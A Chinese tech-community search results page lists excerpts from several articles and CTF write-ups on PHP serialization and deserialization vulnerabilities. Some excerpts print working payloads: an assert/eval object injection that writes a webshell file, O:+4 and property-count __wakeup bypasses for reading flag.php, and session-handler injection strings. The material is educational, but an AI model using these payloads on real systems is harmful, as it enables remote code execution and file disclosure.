首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏我的知识小屋

    php stripslashes 去除斜线

    stripslashes可以去除斜线,准确的说是去掉一个斜线,因为如果是两个斜线的话stripslashes会把两个斜线替换成一个: 引用php手册的例子: <? php $str = "Is your name O\'reilly?"; // 输出: Is your name O'reilly? echo stripslashes($str); ?>

    2.2K10发布于 2021-01-14
  • 来自专栏用户9703952的专栏

    PHP序列化

    PHP序列化原理 原理 序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。 //单引号会输出foo echo “foo”; //双引号会转义,输出data 4. 单引号不能处理变量和转义字符,**除了(\\\和\)** # PHP序列化真题 ## 添加cookie的方法: 1. web262 PHP序列化特点 PHP在进行反序列化时,底层代码是以**;作为字段的分隔,以}**作为结尾(字符串除外),并且是根据长度判断内容的,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 php class user{ public $name = 'purplet'; public $age = '20'; } $b='O:4:"user":3:{s:4:"name";s:7:"purplet

    83510编辑于 2024-02-19
  • 来自专栏Naraku的专栏

    小记 - PHP序列化

    序列化 serialize():用于序列化数组或对象,并返回一个字符串。把一个对象变成可以传输的字符串。 数组序列化 <? unserialize() 数组反序列化 <? php class temp{ var $test = '123'; } $obj = 'O:4:"temp":1:{s:4:"test";s:3:"123";}'; print_r > 输出:为了方便观察,这里将输出格式化了一下,分成4个部分 先输出print_r($obj)部分 然后下面反序列化obj并赋值给un_obj时,因为调用了反序列化函数unserialize(),因此也调用了 __wakeup()函数 输出print_r($un_obj)的内容 最后类销毁时调用了__destruct()函数 O:4:"temp":1:{s:4:"test";s:3:"123";}

    89910发布于 2021-07-29
  • 来自专栏我的知识小屋

    php 序列化对象

    习惯性借用手册里面的介绍: 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 php //首先声明一个数组 $array_1 = array(); //随后。。。 value_value'; $array_1['value2']='value_value'; $array_1['value3']='value_value'; $array_1['value4' 序列化:serialize() 反序列化:unserialize() 注意php手册还说过:“为了能够unserialize()一个对象,这个对象的类必须已经定义过。 如果要想在另外一个文件中解序列化一个对象,这个对象的类必须在解序列化之前定义” 意思就是如果反序列化一个对象,那么这个对象必须在这个php文件里面,或者说已经引入到了这个文件,而且要在反序列化之前定义。

    1.2K10发布于 2021-01-14
  • 来自专栏cwl_Java

    PHP-序列化与反序列化

    1.5 序列化与反序列化PHP中,数组和对象无法保存,如果需要保存就要将数组或对象转换成一个序列。 序列化:将数组或对象转换成一个序列(serialize) 反序列化:将序列化的字符串转换成数组或对象。(unserialize) 1.5.1 数组的序列化与反序列化 <? php //数组的序列化 /* $stu=['tom','berry','ketty']; $str=serialize($stu); //序列化 file_put_contents('. ) 1.5.2 对象的序列化与反序列化 注意:对象的反序列化需要有类的参与,如果没有类在反序列化时候无法确定类 代码 <? php class Student { public $name; protected $sex; private $add; public function __construct($name

    67630编辑于 2022-11-30
  • 来自专栏LuckySec网络安全

    PHP序列化漏洞

    序列化对象格式为例 O:4:"info":2:{s:4:"name";i:2:"19";} 0x005 反序列化漏洞 1. XSS 漏洞示例demo2.php: <? > 构造序列化值: O:1:"A":1:{s:4:"test";s:18:"<?php phpinfo();? 构造序列化值: O:4:"baby":1:{s:4:"file";s:8:"flag.php";} 利用序列化值构造POC: http://101.201.126.95:7003/index.php? data=O:4:"baby":1:{s:4:"file";s:8:"flag.php";} 成功显示了flag.php文件中的内容:在反序列化该数据时,自动触发了_toString()函数,执行 base64 构造如下序列化代码serialize-demo4.php: <?

    1K50编辑于 2022-11-02
  • 来自专栏yuancao博客

    php序列化漏洞

    ()序列化函数 定义 序列化(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中 简单来说,就是将数据转化成一种可逆的数据结构 反序列化就是其逆向的过程 1.序列化: object(对象)的数据类型转换成字符串类型 2.反序列化: 数据串类型的数据转换成object 在PHP应用中 php序列化的函数:serialize() php序列化的函数:unserialize() 示例 clss.php <? un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:9:"eval($_POST[cy])";} ? 蚁剑连接mydx.php文件 ? un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:54:"file_put_contents('cy.php','<?

    1.2K42发布于 2020-09-01
  • 来自专栏很菜的web狗

    PHP序列化漏洞

    ctf很多题型也都是考察PHP序列化的相关知识 PHP序列化 序列化函数serialize() 首先我创一个Ctf类 里面写了三个属性 后创建了一个ctfer对象 将Ctf类里的信息进行了改变。 用的时候在反序列化出来就ok了 O:3:"Ctf":3{s:4:"flag";s:13:"flag{abedyui}";s:4:"name";s:7:"Sch0lar";s:3:"age";s:2:" 18";} O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示 3 代表类名字占三个字符 ctf 类名 3 代表三个属性 s代表字符串 4代表属性名长度 flag属性名 s:13:"flag 该属性长度为6 s:9:"Ctfflag" //ctf前后也就是类名前后出现两个%00 所以长度为9 PHP的反序列化序列化函数unserialize() 反序列化就是将一个序列化的字符串,还原回去 ctf 首先我们本地进行序列化后得到字符串 O:4:"xctf":1:{s:4:"flag";s:3:"111";} 把1写成2 达到绕过wakeup()效果 拿到flag 找到一个 比较能总结这篇文章的题

    90120编辑于 2022-06-09
  • 来自专栏TomatoCool

    PHP序列化漏洞

    主要函数 # 将对象序列化后返回 serialize() # 将字符串反序列化后返回 unserialize() 魔术方法 方法名 触发条件 __construct 创建对象 __destruct 销毁对象 __sleep 序列化对象 __wakeup 反序列化得到对象 __invoke 以函数的形式调用对象 __toString 以字符串的形式调用对象(改方法返回值为字符串) __call 在对象上下文中调用不可访问的方法 从不可访问的属性中读取数据 __set 将数据写入不可访问的数据 __isset 在不可访问的属性上调用isset()或empty()方法 __unset 在不可访问的属性上使用unset()方法 技巧 当序列化字符串中的属性个数大于原本属性个数时

    37510编辑于 2023-07-30
  • 来自专栏尚国

    PHP序列化漏洞

    serialize:序列化 unserialize: 反序列化 简单解释: serialize 把一个对象转成字符串形式, 可以用于保存 unserialize 把serialize序列化后的字符串变成一个对象 可以看到序列化后的变量名字变成 filenameF 了。 看下面代码: <? 下面这个代码中的类跟上面代码的类一样, 不同的地方是我们修改了filename的值, 并生成序列化字符串: <? 文件用于测试, 内容为: password 现在,我们已改变了原来的 filename值,并生成了序列化字符串, 再把它发送到测试代码中去: http://localhost/11.php? php include "xxx.php";#此文件中有类定义, 有魔术函数或方法, 且输入参数能被控制 class Classname{ #存在有害魔术函数或方法,且输入参数能被控制 }

    91920发布于 2018-09-11
  • 来自专栏学习乐园

    详解php序列化

    序列化格式 O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";} 对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值"; 否则会报错 4  PHP序列化漏洞 在学习漏洞前,先来了解一下PHP魔法函数,对接下来的学习会很有帮助 PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法 __construct 当一个对象创建时被调用 Gu3ss_m3_h2h2.php,这个魔法函数在反序列化时会触发并强制转成Gu3ss_m3_h2h2.php 那么问题就来了,如果绕过正则表达式 (1)/[oc]:d+:/i,例如:o:4:这样就会被匹配到 编写php序列化脚本 <? } } } $obj = new Demo('f15g_1s_here.php'); $a = serialize($obj); $a = str_replace('O:4:','O:+4:',

    1.2K00发布于 2021-07-13
  • 来自专栏Andromeda的专栏

    PHP序列化漏洞

    s表示属性名的类型为字符串 4表示属性名长度 name表示属性名 s表示属性的类型为字符串 3表示属性长度 cx表示属性值 …… 反序列化(unserialize) unserialize()将序列化的结果恢复成对象 > 输出结果为: O:4:"Demo":1:{s:4:"file";s:8:"test.php";} Demo Object ( [file] => test.php ) 序列化格式 布尔型 在反序列化操作之前会先执行__wakeup(),判断对象的文件是否为index.php,如果不是则将对象的文件属性变为index.php,注释告诉我们flag在fl4g.php里面,因此我们需要绕过__ 由于序列化后的结果o后面为4,所以需要绕过正则表达式,+号可以实现绕过(+号代表空格),还可以使用true来代替数字1或者异或法。 修改后的序列化结果如下: O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";} 编码、构造payload 然后进行base64编码,注意不要忘记加上两个\x00

    1.5K40编辑于 2022-10-27
  • 来自专栏betasec

    PHP序列化漏洞原理

    本文作者:cream(贝塔安全实验室-核心成员) PHP序列化漏洞原理 1、序列化(串行化) 2、反序列化(反串行化) 3、序列化实例分析 4、反序列化实例分析 5、祸起萧墙---Magic函数 5.1 常见的php系列化和系列化方式主要有:serialize,unserialize;json_encode,json_decode。 和value,s表示是string对象,4表示长度,test是key,i表示是integer对象,123是value 4、反序列化实例分析 <?
    '; } } //反序列化 $user =unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:9:"aaaaaaaaa";}'); txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} ?

    2.3K10发布于 2020-07-31
  • 来自专栏Ms08067安全实验室

    PHP序列化笔记

    > 得到如下内容: O:4:"baby":1:{s:4:"file";s:8:"flag.php";} 2. 重构对象 O:+4:"baby":1:{s:4:"file";s:8:"flag.php";} 3. url编码 O:%2b4:"baby":1:{s:4:"file";s:8:"flag.php";} data=O:%2b4:"baby":1:{s:4:"file";s:8:"flag.php";} CVE-2016-7124 ---- 漏洞介绍 ---- 当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过 a=|O:4:"test":0:{} 那么通过php_serialize反序列化储存的结果就是a:1: {s:1:"a";s:16:"|O:4:"test":0:{}";} 根据php的反序列化格式( a=|O:5:"peiqi":1:{s:4:"meat";s:4:"3333";} ? 然后访问2.php 触发php处理器进行反序列化session文件 ? 此时session文件里面的内容 ?

    1.7K20发布于 2020-02-19
  • 来自专栏ly0n

    PHP序列化学习

    函数介绍 serialize()函数 该函数用于将实例化的对象序列化,或者序列化数组 序列化对象 <? :{s:4:"name";s:7:"cbatl10";} 序列化数组 <? 4 ? 在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行,我们可以将字符串中O:4:”Name”后面的2改为3及以上的整数。这样就可以绕过。 private在序列化中类名和字段名前都要加上ASCII 码为 0 的字符(不可见字符),如果我们直接复制结果,该空白字符会丢失,需要我们自己加上 最终POC O:4:"Name":3:{s:14:"%

    1.2K10发布于 2020-11-04
  • 来自专栏YX’blog

    PHP序列化(未完)

    WEB255 这题可以看出,是从cookie处触发了反序列化php class ctfShowUser{ public $isVip=true; } $a=new ctfShowUser(); echo urlencode(serialize > WEB256 该题多了个对username和password值的对比 所以,我们只需要增加个通过反序列化修改他们值的操作便好 WEB257 首先,我们知道__construct()函数会被 new调用,所以这里我们可以修改其调用的函数,修改至backDoor().并修改$code的值来进行反序列化攻击。 所以现在只需要梳理下图即可 $this->code==0x36d 由于这是双==,即php弱类型,所以只要传递的是877跟上字母即可

    1K40编辑于 2023-04-07
  • 来自专栏ly0n

    PHP序列化字符逃逸

    php序列化字符逃逸 特性一 PHP在反序列化时,对象中不存在的属性也会进行序列化 <? php class Test{ public $test; } $s = 'O:4:"Test":2:{s:4:"test";s:4:"test";s:5:"test1";s:4:"test"; 但事实上并不影响我们进行序列化操作。 特性二 PHP在反序列化时,底层代码是以 ; 作为字段的分隔,,以 } 作为结尾(字符串除外),并根据长度来判断内容。 php $s = 'O:4:"Test":2:{s:4:"test";s:4:"test";s:5:"test1";s:4:"test";}'; var_dump(unserialize($s)); php $s = 'O:4:"Test":2:{s:4:"test";s:4:"test";s:4:"test1";s:4:"test";}i:1;s:5:"aaaaa";'; var_dump(unserialize

    75620发布于 2020-11-04
  • 来自专栏宣言(Siam)博客

    PHP中对象的序列化和反序列化

    php的serialize函数和unserialize函数 serialize() 返回字符串,可以存储于任何地方。 serialize() 可处理除了 resource 之外的任何类型。 这有利于存储或传递 PHP 的值,同时不丢失其类型和结构。 在需要恢复的地方使用unserialize()函数即可 php类魔术方法中的__sleep和__wakeup 在众多的php类魔术方法中(另一篇文章有简单介绍 PHP类,魔术方法),有两个是跟序列化有关的 假设,我们在cli模式的php程序,会根据调用命令解析到不同的类执行。 所以当我们在序列化该类的对象时,不应该包含这两个属性,而应该在wakeup的时候,动态取配置文件的值然后设置进去。

    2K10发布于 2019-12-18
  • 来自专栏ly0n

    PHP Session反序列化学习

    ,默认为0不启动 Session.serialize_handler = php --定义用来序列化/反序列化的处理器名字。 默认使用php PHP Session 序列化及反序列化处理器 PHP 内置了多种处理器用于存取 $_SESSION 数据时会对数据进行序列化和反序列化,常用的有以 下三种。 Php_serialize(php>=5.4) 经过serialize函数反序列化处理后的数组 经过serialize函数反序列化处理后的数组 提供了Session.serialize_handler 测试1 使用不同的引擎来处理session文件 php引擎的存储格式是键名 | 反序列化处理的值 php_serialize引擎的存储格式是反序列化处理的值。 > 4.png 访问php_serialize.php传入payload,注意在最前面加一个|。

    1.3K60发布于 2020-10-28
  • 来自专栏ly0n

    PHP Session反序列化学习

    ,默认为0不启动 Session.serialize_handler = php --定义用来序列化/反序列化的处理器名字。 默认使用php PHP Session 序列化及反序列化处理器 PHP 内置了多种处理器用于存取 $_SESSION 数据时会对数据进行序列化和反序列化,常用的有以 下三种。 Php_serialize(php>=5.4) 经过serialize函数反序列化处理后的数组 经过serialize函数反序列化处理后的数组 提供了Session.serialize_handler 测试1 使用不同的引擎来处理session文件 php引擎的存储格式是键名 | 反序列化处理的值 php_serialize引擎的存储格式是反序列化处理的值。 O:7:"student":2:{s:4:"name";s:4:"ly0n";s:3:"age";s:4:"1111";} 访问php_serialize.php传入payload,注意在最前面加一个|

    89820发布于 2020-11-04
领券